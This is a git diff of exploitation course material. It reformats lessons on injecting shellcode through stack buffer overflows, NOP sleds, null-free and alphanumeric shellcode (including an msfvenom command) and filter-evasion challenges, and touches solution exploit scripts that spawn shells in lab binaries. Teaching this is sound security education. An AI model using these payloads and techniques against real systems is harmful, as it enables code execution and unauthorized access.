The only limit is how much data we can feed into the program when we inject our shellcode. +But 8 is such a small number; +the longer the NOP sled, the better our chances. +The only limit is how much data we can feed into the program when we inject our shellcode. - * Run `make`, then inspect the `vuln` binary in `gdb` and determine the location of the vulnerable buffer. - * Modify line 14 of the `exploit.py` script with the address you've found, then run the script. Most likely, it will not work: the address outside of `gdb` is different. - * Uncomment line 17 of the script, then run it again. - * You should now have a shell! +- Run `make`, then inspect the `vuln` binary in `gdb` and determine the location of the vulnerable buffer. +- Modify line 14 of the `exploit.py` script with the address you've found, then run the script. +Most likely, it will not work: the address outside of `gdb` is different. +- Uncomment line 17 of the script, then run it again. +- You should now have a shell! -If this doesn't work, play a bit with the address left on line 14; increment it by 256, then decrement it by 256. You're aiming to get **below** the actual address at some offset smaller than the NOP sled length which, in this example, is 1536. +If this doesn't work, play a bit with the address left on line 14; +increment it by 256, then decrement it by 256. +You're aiming to get **below** the actual address at some offset smaller than the NOP sled length which, in this example, is 1536. -## 03. Tutorial: null-free shellcodes +### 03. Tutorial: null-free shellcodes -Up until now, all the vulnerable programs attacked used `read` as a method of getting the input. This allows us to feed them any string of arbitrary bytes. In practice, however, there are many cases in which the input is treated as a 0-terminated *string* and processed by functions like `strcpy`. +Up until now, all the vulnerable programs attacked used `read` as a method of getting the input. 
+This allows us to feed them any string of arbitrary bytes. +In practice, however, there are many cases in which the input is treated as a 0-terminated string and processed by functions like `strcpy`. -This means that our shellcode cannot contain a 0 byte because, as far as functions like `strcpy` are concerned, that signals the end of the input. However, shellcodes are likely to contain 0 bytes. For example, remember that we need to set `rax` to a value indicating the syscall we want; if we wish to `execve` a new shell, we'll have to place the value `59` in `rax`: +This means that our shellcode cannot contain a 0 byte because, as far as functions like `strcpy` are concerned, that signals the end of the input. +However, shellcodes are likely to contain 0 bytes. +For example, remember that we need to set `rax` to a value indicating the syscall we want; +if we wish to `execve` a new shell, we'll have to place the value `59` in `rax`: ```asm mov rax, 0x3b @@ -158,21 +175,30 @@ This means that our shellcode cannot contain a 0 byte because, as far as functio Due to the nature of x86 instructions and the size of the `rax` register, that `0x3b` might be considered an 8-byte wide constant, yielding the following machine code: `48 b8 3b 00 00 00 00 00 00 00`. -As you can see, there are quite a lot of zeroes. We could get rid of them if we considered `0x3b` to be a 1-byte wide constant; unfortunately there's no instruction to place into `rax` an immediate 1-byte value. However, there is an instruction to place an immediate 1-byte value in `al`, the lowest octet of `rax`. But we need the other seven octets to be 0... Fortunately, we can do a trick by xor-ing the register with itself! This will make every bit 0, plus the `xor` instruction itself doesn't contain 0 bytes. So we can replace the code above with: +As you can see, there are quite a lot of zeroes.
+We could get rid of them if we considered `0x3b` to be a 1-byte wide constant; +unfortunately there's no instruction to place into `rax` an immediate 1-byte value. +However, there is an instruction to place an immediate 1-byte value in `al`, the lowest octet of `rax`. +But we need the other seven octets to be 0... +Fortunately, we can do a trick by xor-ing the register with itself! +This will make every bit 0, plus the `xor` instruction itself doesn't contain 0 bytes. +So we can replace the code above with: ```asm xor rax, rax mov al, 0x3b ``` -Which assembles to `48 31 c0 b0 3b`. Not only are there no 0 bytes, we've also reduced the size of the code! +Which assembles to `48 31 c0 b0 3b`. +Not only are there no 0 bytes, we've also reduced the size of the code! Takeaways: - * xor-ing a register with itself is a good way of obtaining some zeroes in memory without using zeroes in machine code - * working with the lower parts of registers avoids immediate values with leading-zeroes +- xor-ing a register with itself is a good way of obtaining some zeroes in memory without using zeroes in machine code +- working with the lower parts of registers avoids immediate values with leading-zeroes -We can apply these insights in other situations to avoid zeroes in our code. For example, instead of +We can apply these insights in other situations to avoid zeroes in our code. +For example, instead of ```asm mov rax, `/bin/sh\0` @@ -190,13 +216,19 @@ We can write: Note that extra-slashes in a path don't make any difference. -The `vuln.c` program reads data properly into a buffer, then uses `strcpy` to move data into a smaller buffer, resulting in an overflow. Run `make`, then the `exploit.py` script; just like before, it will start a new terminal window with a `gdb` instance in which you can explore what happens. The attack will fail because the injected shellcode contains 0 bytes so `strcpy` will only stop copying well before the end of the shellcode. 
+The `vuln.c` program reads data properly into a buffer, then uses `strcpy` to move data into a smaller buffer, resulting in an overflow. +Run `make`, then the `exploit.py` script; +just like before, it will start a new terminal window with a `gdb` instance in which you can explore what happens. +The attack will fail because the injected shellcode contains 0 bytes so `strcpy` will stop copying well before the end of the shellcode. -Comment line 55 and uncomment line 56, replacing the shellcode with a null-free version. Run `exploit.py` again. It should work! - -## 04. Tutorial: shellcodes in pwntools +Comment line 55 and uncomment line 56, replacing the shellcode with a null-free version. +Run `exploit.py` again. +It should work! -Once again, `pwntools` can come to our aid and help us with shellcode attacks. The most useful feature for this is the [shellcraft module](https://docs.pwntools.com/en/stable/shellcraft.html) which offers prebuilt shellcodes for various architectures. +### 04. Tutorial: shellcodes in pwntools + +Once again, `pwntools` can come to our aid and help us with shellcode attacks. +The most useful feature for this is the [shellcraft module](https://docs.pwntools.com/en/stable/shellcraft.html) which offers prebuilt shellcodes for various architectures. For example, to obtain a shellcode which performs `execve("/bin/sh", {"/bin/sh", NULL}, NULL)` on an `x86_64` platform we can call: @@ -204,90 +236,123 @@ For example, to obtain a shellcode which performs `execve("/bin/sh", {"/bin/sh", shellcraft.amd64.linux.sh() ``` -Note that this will give you back text representing *assembly code* and **not** *machine code* bytes. You can then use the `asm` function to assemble it: +Note that this will give you back text representing assembly code and **not** machine code bytes. +You can then use the `asm` function to assemble it: ```python asm(shellcraft.amd64.linux.sh(), arch="amd64", os="linux") ``` -Remember the friendly features of pwntools!
Instead of always specifying the OS and the architecture, we can set them in the global context, like this: + +Remember the friendly features of pwntools! +Instead of always specifying the OS and the architecture, we can set them in the global context, like this: ```python context.arch="amd64" context.os="linux" ``` -Or - even simpler - we can indicate a particular binary and let pwntools deduce the OS and architecture: `context.binary = "./vuln"`. We can then invoke a much cleaner `asm(shellcraft.sh())`. +Or - even simpler - we can indicate a particular binary and let pwntools deduce the OS and architecture: `context.binary = "./vuln"`. +We can then invoke a much cleaner `asm(shellcraft.sh())`. -Besides the magic snippet to invoke a shell, there are other builtin code fragments, such as to cause a crash, an infinite loop, `cat` a file or call some other syscall. Play around with `shellcraft`, inspecting the output. You'll notice that all these shellcodes are free of zero bytes and newlines! +Besides the magic snippet to invoke a shell, there are other builtin code fragments, such as to cause a crash, an infinite loop, `cat` a file or call some other syscall. +Play around with `shellcraft`, inspecting the output. +You'll notice that all these shellcodes are free of zero bytes and newlines! -## 05. Tutorial: alphanumeric shellcode +### 05. Tutorial: alphanumeric shellcode -It is commonly the case that user input is filtered to make sure it matches certain conditions. Most user input expected from a keyboard should not contain non-printable characters; a "name" should contain only letters, a PIN should contain only digits, etc. +It is commonly the case that user input is filtered to make sure it matches certain conditions. +Most user input expected from a keyboard should not contain non-printable characters; +a "name" should contain only letters, a PIN should contain only digits, etc. 
-The program might check its input against some conditions and, if rejected, bail in such a way so as to not trigger our injected code. This places the burden on us to develop shellcode that doesn't contain certain bytes. We've seen how we can avoid newlines and zero bytes to work around some input-reading functions. This concept can be pushed even further, heavily restricting our character set: on 32-bit platforms, we can write **alphanumeric shellcodes**! +The program might check its input against some conditions and, if rejected, bail in such a way so as to not trigger our injected code. +This places the burden on us to develop shellcode that doesn't contain certain bytes. +We've seen how we can avoid newlines and zero bytes to work around some input-reading functions. +This concept can be pushed even further, heavily restricting our character set: on 32-bit platforms, we can write **alphanumeric shellcodes**! -But can we really? It's plausible that there are some clever tricks on the level of replacing `mov eax, 0x3b` with `xor eax, eax; mov al, 0x3b` that could make use of only alphanumeric characters, but all our shellcodes so far need to perform a syscall. Looking at the encoding of the `int 0x80` instruction seems pretty grim: `\xcd\x80`. Those are not even printable characters. So how can we perform a syscall? +But can we really? +It's plausible that there are some clever tricks on the level of replacing `mov eax, 0x3b` with `xor eax, eax; mov al, 0x3b` that could make use of only alphanumeric characters, but all our shellcodes so far need to perform a syscall. +Looking at the encoding of the `int 0x80` instruction seems pretty grim: `\xcd\x80`. +Those are not even printable characters. +So how can we perform a syscall? 
Here it's important to step back and carefully consider our assumptions: - * There is some memory region to which we have both write and execute access (otherwise we wouldn't attempt a code injection attack) - * After our input is read, there is some check on it to make sure it doesn't contain certain characters. +- There is some memory region to which we have both write and execute access (otherwise we wouldn't attempt a code injection attack) +- After our input is read, there is some check on it to make sure it doesn't contain certain characters. -Aha! We cannot **inject** some bytes, but nothing's stopping us from injecting something that **generates** those bytes! Generating is just an alternative way of *writing*, so instead of **injecting** our shellcode, we'll inject some code which **generates** the shellcode, then executes it! +Aha! +We cannot **inject** some bytes, but nothing's stopping us from injecting something that **generates** those bytes! +Generating is just an alternative way of writing, so instead of **injecting** our shellcode, we'll inject some code which **generates** the shellcode, then executes it! -This is, in fact, as complicated as it sounds, so we won't do it ourselves. We'll just observe how such a shellcode, produced by a specialized tool (`msfvenom`) works. So invoke the following command, which should give you a python-syntax buffer containing an alphanumeric shellcode that executes "/bin/sh": +This is, in fact, as complicated as it sounds, so we won't do it ourselves. +We'll just observe how such a shellcode, produced by a specialized tool (`msfvenom`) works. 
+So invoke the following command, which should give you a python-syntax buffer containing an alphanumeric shellcode that executes "/bin/sh": `msfvenom -a x86 --platform linux -p linux/x86/exec -e x86/alpha_mixed BufferRegister=ECX -f python` - * `-a x86`: specifies the architecture as 32-bit x86 - * `--platform linux`: specifies OS - * `-p linux/x86/exec`: specifies a preset program (you can use `-` or `STDIN` for a custom initial shellcode, to be transformed) - * `-e x86/alpha_mixed`: specifies encoding to be alphanumeric - * `BufferRegister=ECX`: specifies an initial register which holds the address of the buffer; this is needed in order to have some way to refer to the region in which we're unpacking our code. Without this, a short non-alphanumeric preamble is added instead to automatically extract the buffer address - * `-f python`: formats output using python syntax +- `-a x86`: specifies the architecture as 32-bit x86 +- `--platform linux`: specifies OS +- `-p linux/x86/exec`: specifies a preset program (you can use `-` or `stdin` for a custom initial shellcode, to be transformed) +- `-e x86/alpha_mixed`: specifies encoding to be alphanumeric +- `BufferRegister=ECX`: specifies an initial register which holds the address of the buffer; +this is needed in order to have some way to refer to the region in which we're unpacking our code. +Without this, a short non-alphanumeric preamble is added instead to automatically extract the buffer address +- `-f python`: formats output using python syntax `msfvenom` is actually capable of taking an arbitrary assembly snippet and transforming it into an alphanumeric "bootstrapper" which, once injected, unpacks the original shellcode and executes it. -# Challenges +## Challenges -## 06. Challenge: NOP sled redo +### 06. Challenge: NOP-sled Redo -Redo the last three challenges (9, 10, 11) from [the previous session](../shellcodes) using NOP-sleds. 
+Redo the last three challenges (9, 10, 11) from [the "Shellcodes" session](../../shellcodes/reading) using NOP-sleds. -## 07. Challenge: No NOPs allowed! +### 07. Challenge: No NOPs Allowed -This is similar to the previous tasks: you are left to guess a stack address. However, the `\x90` byte is filtered from input so you cannot use a NOP sled. But you should be able to adapt the concept. Remember the relevant features of the "NOP" instruction! +This is similar to the previous tasks: you are left to guess a stack address. +However, the `\x90` byte is filtered from input so you cannot use a NOP sled. +But you should be able to adapt the concept. +Remember the relevant features of the "NOP" instruction! -## 08. Challenge: multiline output +### 08. Challenge: Multiline Output -While perfectly ok with the byte 0, some functions (e.g. `fgets`) will stop reading when they encounter a newline character (`\n`). Thus, if our input is read by such a function, we need to make sure our shellcode contains no `\n` bytes. +While perfectly ok with the byte 0, some functions (e.g. +`fgets`) will stop reading when they encounter a newline character (`\n`). +Thus, if our input is read by such a function, we need to make sure our shellcode contains no `\n` bytes. For this challenge, the input will be read using the `gets` function, but you will need to craft a shellcode which prints to `stdout` the exact string: -``` +```text first second third ``` -## 09: Challenge: `execve` blocking attempt +### 09. Challenge: `execve` blocking attempt -If shellcodes are such a powerful threat, what if we attempted to block some shellcode-sepcific characters? Such as the bytes that encode a `syscall` function. Or the slash needed in a path; maybe it's not such a big loss to avoid these in legitimate inputs. +If shellcodes are such a powerful threat, what if we attempted to block some shellcode-specific characters? +Such as the bytes that encode a `syscall` function.
+Or the slash needed in a path; +maybe it's not such a big loss to avoid these in legitimate inputs. -Can you still get a shell? For this task, **don't use** an existing encoder, but rather apply the encoding principles yourself. +Can you still get a shell? +For this task, **don't use** an existing encoder, but rather apply the encoding principles yourself. -# Further Reading +## Further Reading -["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. +["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. +As it was written in '96, the examples in it will probably **not** work (either out-of-the-box or with some tweaks). +We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. -## Input restrictions +### Input restrictions -The following articles deal with restrictions on the shellcode structure, such as forbidden characters or statistical properties of the input string. The examples presented will most likely not work as-they-are in a modern environment, so don't focus on the technical details, but rather on the methodology presented. +The following articles deal with restrictions on the shellcode structure, such as forbidden characters or statistical properties of the input string. +The examples presented will most likely not work as-they-are in a modern environment, so don't focus on the technical details, but rather on the methodology presented.
[*Writing ia32 alphanumeric shellcodes*, 2001 - rix](http://phrack.org/issues/57/15.html) - probably the first comprehensive presentation of how to automatically convert generic shellcodes to alphanumeric ones. -[*Building IA32 'Unicode-Proof' Shellcodes*, 2003 - obscou](http://phrack.org/issues/61/11.html) - rather than being concerned with input *restrictions*, this addresses ulterior transformations on input, namely converting an ASCII string to a UTF-16 one (as mentioned in the article's introduction, you could also imagine other possible transformations, such as case normalization). +[*Building IA32 'Unicode-Proof' Shellcodes*, 2003 - obscou](http://phrack.org/issues/61/11.html) - rather than being concerned with input restrictions, this addresses subsequent transformations on input, namely converting an ASCII string to a UTF-16 one (as mentioned in the article's introduction, you could also imagine other possible transformations, such as case normalization). [*Writing UTF-8 compatible shellcodes*, 2004 - Wana](http://phrack.org/issues/62/9.html) -[*English shellcode*, 2009 - Mason, Small, Monrose, MacManus](https://www.cs.jhu.edu/~sam/ccs243-mason.pdf) - delves into automatically generating shellcode which has the same statistical properties as English text. +[*English shellcode*, 2009 - Mason, Small, Monrose, MacManus](https://www.cs.jhu.edu/~sam/ccs243-mason.pdf) - delves into automatically generating shellcode which has the same statistical properties as English text.
diff --git a/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py index f3ced20..57d6f66 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py @@ -19,10 +19,10 @@ # First part: inject payload = b"" payload += shellcode -payload += (128 - len(shellcode)) * b'A' +payload += (128 - len(shellcode)) * b"A" # Second part: trigger -payload += (buf_offset + 8) * b'A' # + 8 for the saved rbp +payload += (buf_offset + 8) * b"A" # + 8 for the saved rbp payload += pack(machine_code_addr) io = process(BIN) diff --git a/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py index 51f302b..cb9591f 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py @@ -18,7 +18,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py index 947ddc9..7823f3a 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py @@ -17,7 +17,7 @@ # Inject and trigger payload = b"" -payload += (offset + 8) * b'A' 
+payload += (offset + 8) * b"A" payload += pack(addr + offset + 16) payload += shellcode diff --git a/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py index 1ca7c3b..d960713 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py @@ -10,7 +10,7 @@ offset = 0x4 # From gdb -arg_addr = 0x7fffffffd9dd +arg_addr = 0x7FFFFFFFD9DD shellcode = asm(shellcraft.sh()) @@ -18,7 +18,7 @@ for diff in range(-128, 128): # Simple control flow hijacking payload = b"" - payload += (offset + 8) * b'A' + payload += (offset + 8) * b"A" payload += pack(arg_addr + diff) io = process([BIN, shellcode]) diff --git a/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py index b23f269..aead0e0 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py @@ -10,7 +10,7 @@ offset = 0x4 # From gdb -env_addr = 0x7fffffffd9dd +env_addr = 0x7FFFFFFFD9DD shellcode = asm(shellcraft.sh()) @@ -18,7 +18,7 @@ for diff in range(-128, 128): # Simple control flow hijacking payload = b"" - payload += (offset + 8) * b'A' + payload += (offset + 8) * b"A" payload += pack(env_addr + diff) io = process(BIN, env={"SHELLCODE": shellcode}) diff --git a/chapters/exploitation-techniques/shellcodes/reading/README.md b/chapters/exploitation-techniques/shellcodes/reading/README.md index f532fbe..805a541 100644 --- a/chapters/exploitation-techniques/shellcodes/reading/README.md +++ b/chapters/exploitation-techniques/shellcodes/reading/README.md @@ -1,74 +1,59 @@ 
---- -linkTitle: Shellcodes -type: docs -weight: 10 ---- +# Shellcodes -
- Table of contents - - * [Introduction](#introduction) - * [Stack-buffer-overflow recap](#stack-buffer-overflow-recap) - * [Code injection](#code-injection) - * [Develop](#develop) - * [Inject](#inject) - * [Trigger](#trigger) - * ["Shellcodes"](#shellcodes) - * [Tutorials](#tutorials) - * [01. Tutorial: generating machine code](#01-tutorial-generating-machine-code) - * [02. Tutorial: inspecting machine code](#02-tutorial-inspecting-machine-code) - * [03. Tutorial: feeding machine code to a program](#03-tutorial-feeding-machine-code-to-a-program) - * [04. Tutorial: "Hello, world!" shellcode](#04-tutorial-hello-world-shellcode) - * [05. Tutorial: Debugging shellcodes](#05-tutorial-debugging-shellcodes) - * [Challenges](#challenges) - * [06. Challenge: /bin/sh shellcode](#06-challenge-binsh-shellcode) - * [07. Challenge: shellcode on stack](#07-challenge-shellcode-on-stack) - * [08. Challenge: shellcode after saved ret](#08-challenge-shellcode-after-saved-ret) - * [09. Challenge: shellcode after saved ret - no leak](#09-challenge-shellcode-after-saved-ret---no-leak) - * [10. Challenge: shellcode as command line arg](#10-challenge-shellcode-as-command-line-arg) - * [11. Challenge: shellcode in the environment](#11-challenge-shellcode-in-the-environment) - * [Further Reading](#further-reading) - * [Resources](#resources) +## Introduction -
+### Stack Buffer Overflow Recap -# Introduction +In the last session, we studied what an attacker can do to a program with a stack-buffer-overflow vulnerability: fill up the legitimately reserved space with junk, then overwrite the saved-return value with an address of their choosing. +After the vulnerable function's execution ends, its final `ret` will place the attacker's chosen address into the `eip`/`rip` and execution will continue from there. -## Stack-buffer-overflow recap +![Stack Buffer](../media/stack_buffer.png) -In the last session, we studied what an attacker can do to a program with a stack-buffer-overflow vulnerability: fill up the legitimately reserved space with junk, then overwrite the saved-return value with an address of their choosing. After the vulnerable function's execution ends, its final `ret` will place the attacker's chosen address into the `eip`/`rip` and execution will continue from there. +The above scenario limits the attacker to the functionality already present in the vulnerable program. +If an attacker desires to spawn a shell, but no shell-spawning code is already present - tough luck! +In this session we will start studying a method of overcoming this limitation: code injection. - +### Code Injection -The above scenario limits the attacker to the functionality already present in the vulnerable program. If an attacker desires to spawn a shell, but no shell-spawning code is already present - tough luck! In this session we will start studying a method of overcoming this limitation: code injection. +If the code we want to execute is not present in the target program, we'll simply add it ourselves! +We will implement our desired functionality in machine code, inject (which is just a fancy word for "write") it into the target process' memory, then force execution to jump to the beginning of our code. +These steps can be succinctly summarized as: develop, inject, trigger. 
-## Code injection +#### Develop -If the code we want to execute is not present in the target program, we'll simply add it ourselves! We will implement our desired functionality in machine code, inject (which is just a fancy word for "write") it into the target process' memory, then force execution to jump to the beginning of our code. These steps can be succinctly summarized as: develop, inject, trigger. +First, we need to implement our desired functionality. +Our goal is to obtain _something_ that can be placed directly into the memory space of a running process and be executed; +so it cannot be text representing code in C, Python, Java etc. +It must be _machine code_. +This might seem a very difficult task, but we'll simply use the tools we usually employ when writing code that we intend to run; +in particular, we will rely on the assembler: we write ASM code to do what we want, then assemble it to obtain a string of machine code bytes. -### Develop +#### Inject -First, we need to implement our desired functionality. Our goal is to obtain _something_ that can be placed directly into the memory space of a running process and be executed; so it cannot be text representing code in C, Python, Java etc. It must be _machine code_. This might seem a very difficult task, but we'll simply use the tools we usually employ when writing code that we intend to run; in particular, we will rely on the assembler: we write ASM code to do what we want, then assemble it to obtain a string of machine code bytes. +Once we have our string of machine code bytes, we need it to be present in the memory space of the target process. +This means the program must read some input (with a `gets`, `fgets`, `fscanf`, `read` etc.). +However, if we can _launch_ the program, we can also place our code in the environment or inside a command line argument; +even if a program doesn't use these, the loader still places them in its address space. 
-### Inject +#### Trigger -Once we have our string of machine code bytes, we need it to be present in the memory space of the target process. This means the program must read some input (with a `gets`, `fgets`, `fscanf`, `read` etc.). However, if we can _launch_ the program, we can also place our code in the environment or inside a command line argument; even if a program doesn't use these, the loader still places them in its address space. +After having placed our code inside the memory space of the target process, we need to force execution to jump at its beginning. +We already know how to do this, by means of a stack-buffer-overflow, which we studied in the previous session. -### Trigger +### "Shellcodes" -After having placed our code inside the memory space of the target process, we need to force execution to jump at its beginning. We already know how to do this, by means of a stack-buffer-overflow, which we studied in the previous session. +Usually, the end-goal of an attacker is to force the program to spawn a shell, thus gaining unlimited access. +This can be achieved by injecting machine code that triggers an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` system call, hence the name "shellcode". +However, this label is also used for any piece of injected code, even if it does not spawn a shell. -## "Shellcodes" +## Tutorials -Usually, the end-goal of an attacker is to force the program to spawn a shell, thus gaining unlimited access. This can be achieved by injecting machine code that triggers an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` system call, hence the name "shellcode". However, this label is also used for any piece of injected code, even if it does not spawn a shell. +### 01. Tutorial: Generating Machine Code -# Tutorials +To address the first step of our code injection technique, we will start with a simple example: we want to force the program to end cleanly with an exit code of 42; +more precisely we want to execute an `exit(42)` system call. 
-## 01. Tutorial: generating machine code - -To address the first step of our code injection technique, we will start with a simple example: we want to force the program to end cleanly with an exit code of 42; more precisely we want to execute an `exit(42)` system call. - -```nasm +```asm BITS 64 mov rdi, 42 mov rax, 60 @@ -79,38 +64,41 @@ BITS 64 We can then use `nasm` to obtain a file with machine code: -``` -$ nasm exit_shellcode.nasm -o exit_shellcode.bin +```console +nasm exit_shellcode.nasm -o exit_shellcode.bin ``` **NOTE:** `exit_shellcode.bin` is not an ELF: -``` +```console $ file exit_shellcode.bin exit_shellcode.bin: data ``` -It is not an executable file at all, but simply contains a raw string of machine code bytes. You can see that it is very, very small: +It is not an executable file at all, but simply contains a raw string of machine code bytes. +You can see that it is very, very small: -``` +```console $ wc --bytes exit_shellcode.bin 12 exit_shellcode.bin ``` -## 02. Tutorial: inspecting machine code +### 02. Tutorial: Inspecting Machine Code -We would also like to be able to do the reverse of this: given a file that contains a raw string of machine code bytes, translate it back into readable assembly. This is useful to check that our assembly process was correct, as well as for analyzing files that we did not create. +We would also like to be able to do the reverse of this: given a file that contains a raw string of machine code bytes, translate it back into readable assembly. +This is useful to check that our assembly process was correct, as well as for analyzing files that we did not create. -In [the first session](../exploration-tools), we learned to disassemble using `objdump`. By default, `objdump` expects a proper `ELF` executable and complains about our raw file: +In [the first session](../../../binary-analysis/exploration-tools/reading), we learned to disassemble using `objdump`. 
+By default, `objdump` expects a proper `ELF` executable and complains about our raw file: -``` +```console $ objdump -d -M intel exit_shellcode.bin objdump: exit_shellcode.bin: file format not recognized ``` We need to use the following command: -``` +```console $ objdump -D -b binary -m i386:x86-64 -M intel exit_shellcode.bin test.bin: file format binary @@ -125,74 +113,77 @@ Disassembly of section .data: 11: 0f 05 syscall ``` -* `-D`: disassemble all, not only text/code zones. In our case this means disassemble the whole file. -* `-b binary`: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE). -* `-m i386:86-64`: the machine code inside the binary file is i386 (x86), 64 bits (usually, `objdump` gets this information from the ELF header). -* `-M intel`: display ASM using Intel assembly syntax, as opposed to AT&T assembly syntax. +- `-D`: disassemble all, not only text/code zones. +In our case this means disassemble the whole file. +- `-b binary`: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE). +- `-m i386:x86-64`: the machine code inside the binary file is i386 (x86), 64 bits (usually, `objdump` gets this information from the ELF header). +- `-M intel`: display ASM using Intel assembly syntax, as opposed to AT&T assembly syntax. We can also use a tool like `xxd` or `hexdump` to inspect the byte values in the file, without disassembling: -``` +```console $ xxd exit_shellcode.bin 00000000: 48c7 c0ff ffff ffbf 2a00 0000 b83c 0000 H.......*....<.. 00000010: 000f 05 ... ``` -## 03. Tutorial: feeding machine code to a program +### 03. Tutorial: Feeding Machine Code to a Program -Now that we know how to obtain a bytestring of machine code from an assembly program, it's time to move on to the next step: injection. The simplest way is to redirect the `stdin` of the target program to the file containing our raw machine code.
+Now that we know how to obtain a bytestring of machine code from an assembly program, it's time to move on to the next step: injection. +The simplest way is to redirect the `stdin` of the target program to the file containing our raw machine code. -``` -$ ./vuln < exit_shellcode.bin +```console +./vuln < exit_shellcode.bin ``` -However, we might want to freely edit the payload directly on the command line (for example, if the program reads some other stuff). The way to do this is to use another tool, like the shell itself, to transform hexadecimal notation into binary data: +However, we might want to freely edit the payload directly on the command line (for example, if the program reads some other stuff). +The way to do this is to use another tool, like the shell itself, to transform hexadecimal notation into binary data: -``` +```console $ printf '\x4b\x80\x04\x08' K� ``` Again, we can use a tool like `xxd` for the reverse operation, to verify that the binary data comes out as intended: -``` +```console $ printf '\x4b\x80\x04\x08' | xxd -p 4b800408 ``` If our machine code is contained in a file, we can use `hexdump` to obtain an escaped hexadecimal representation of its contents: -``` +```console $ hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin \x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05 ``` Which we can then combine with some other input -``` -$ printf '1\x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05' | ./vuln2 +```console +printf '1\x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05' | ./vuln2 ``` Or we can do this directly: -``` -$ printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | ./vuln2 +```console +printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | ./vuln2 ``` We can then verify that the program did indeed exit with code 42: -``` +```console $ echo $? 42 ``` -## 04. Tutorial: "Hello, world!" shellcode +### 04. 
Tutorial: "Hello, world!" Shellcode -Our aim now is to develop a shellcode that prints `"Hello, world!\n"` to stdout, then inject it into `vuln` and trigger its execution. +Our aim now is to develop a shellcode that prints `"Hello, world!\n"` to standard output, then inject it into `vuln` and trigger its execution. We start by writing a shellcode that does a `write(1, "Hello, world!\n", 14)` system call, by writing the string on to the stack such that the stack pointer points to the beginning of the string. -```nasm +```asm ; Write "Hello, world!\n" to the standard output. BITS 64 ; We can't push 64 bit constants, but we can push 64 bit registers. @@ -211,18 +202,20 @@ This is just one way to do it and there are other possible approaches to it. We then assemble our snippet to get a string of machine code bytes (the `Makefile` provided already does this). -``` -$ nasm hello_shellcode.nasm -o hello_shellcode.bin +```console +nasm hello_shellcode.nasm -o hello_shellcode.bin ``` Our vulnerable program first reads 128 bytes into a global buffer (line 8): + ```c read(0, machine_code, 128); ``` -Our shellcode-injecting payload needs to consist of the shellcode itself and some junk to pad the payload length to 128. First, we need to determine the shellcode size in bytes, then we use a tool like python to generate the string: +Our shellcode-injecting payload needs to consist of the shellcode itself and some junk to pad the payload length to 128. +First, we need to determine the shellcode size in bytes, then we use a tool like python to generate the string: -``` +```console $ wc -c hello_shellcode.bin 42 hello_shellcode.bin @@ -237,9 +230,10 @@ char buf[16]; read(0, buf, 128); ``` -All we need to do is to pad the legitimately reserved space until the saved return address, then overwrite it with the address of `machine_code`. 
Thus we will probably need 16 + 8 (the saved `rbp`) bytes of padding, but remember that we can't rely on the layout we see in C and must inspect the binary: +All we need to do is to pad the legitimately reserved space until the saved return address, then overwrite it with the address of `machine_code`. +Thus we will probably need 16 + 8 (the saved `rbp`) bytes of padding, but remember that we can't rely on the layout we see in C and must inspect the binary: -``` +```console $ objdump -d -M intel ./vuln ... 0000000000401126
